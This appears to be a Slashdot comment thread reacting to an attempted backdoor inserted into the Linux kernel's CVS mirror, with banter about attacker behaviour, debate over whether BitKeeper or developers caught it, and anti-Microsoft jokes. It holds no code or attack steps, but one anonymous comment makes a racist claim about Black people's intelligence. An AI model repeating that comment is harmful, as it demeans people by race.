Re:Ebay-style attacks (0)

spicedhamhawg (718466) | more than 10 years ago | (#7404572)

3) Keep doing what you were always doing. If you suddenly disappear, that could raise suspicions. (No, I'm not a blackhat, but I am a sysadmin, and you have to think like your enemies think if you want to keep them out.)

4) ???

5) Profit!

Because of 5, it's clear that MS or SCO must be behind it ;-)

ROFL (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#7404516)

awesome!

My boss is gonna read this.. (0)

Anonymous Coward | more than 10 years ago | (#7404518)

Oh man, if my boss sees this, thats gonna be it right there.. No more Linux for us

Finding the culprit (-1, Troll)

Anonymous Coward | more than 10 years ago | (#7404538)

We should start by the process of elimination.

We know that the culprit was NOT a Negro. Negroes are not smart enough to even attempt something like this. Therefore we can rule out all the Negroes who are kernel hackers.

Come to think of it, there aren't any Negro kernel hackers. My bad!

No one is mentioning this (0, Insightful)

Dancin_Santa (265275) | more than 10 years ago | (#7404552)

The problem is that CVS was exploited. That's the big deal, Open Source, all encompassing versioning system.

It was Bitkeeper, the closed source, unfree, anti-community product that caught the problem.

This isn't a triumph of 'many eyes' seeing this bad code in Linux, it was a failure of 'many eyes' not catching the problem in CVS.

troll (0)

Anonymous Coward | more than 10 years ago | (#7404567)

Bitkeeper... caught the problem

Err, no. One of the kernel hackers watching the changes caught the issue.

Not a troll (0)

Anonymous Coward | more than 10 years ago | (#7404584)

From the writeup:

in fact it was the BitKeeper CVS export scripts that detected the unauthorized modifications to CVS

Microsoft reply (-1, Troll)

Blair16 (683764) | more than 10 years ago | (#7404576)

At Steve Ballmer's next big speech:
If Microsoft had open source code, anybody would be able to hack into our source tree and create a back door in the Windows OS. But since we are closed source, there are no vulnerabilities!

ALIANWARE = OVERRATED (0)

Anonymous Coward | more than 10 years ago | (#7404578)

Please, stop with all this bogus hype!
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?